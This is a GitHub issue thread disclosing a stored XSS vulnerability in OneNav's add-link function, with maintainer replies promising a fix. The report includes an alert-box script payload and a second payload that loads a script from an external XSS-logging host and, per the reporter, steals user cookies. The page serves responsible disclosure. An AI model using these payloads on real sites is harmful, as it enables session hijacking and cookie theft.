New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
OneNav's add link function exists xss vul #26
Comments
|
您好,感谢您的反馈,目前后台确实没有做XSS过滤,一般正常的用户,不会通过后台权限自己给自己注入XSS代码,除非帐号、密码已经泄露。不过始终也算一个潜在风险,后续会增加XSS过滤和验证。 |
|
Yes, there has a big problem: |
|
Hi @helloxz , |
|
@nu11secur1ty @OS-WS @alex123-2star Hello everyone, this issue is expected to be fixed in the next version, thanks for your feedback. |
|
Ok tnx and BR |
|
|
|
<3 |

add link function path




input xss payload 1 :"><script>alert("XSS")</script>
click 添加 button
alert xss success
input xss payload 2:<sCRiPt sRC=//xss.pt/NZ9j></sCrIpT>
Get user cookie success
The text was updated successfully, but these errors were encountered: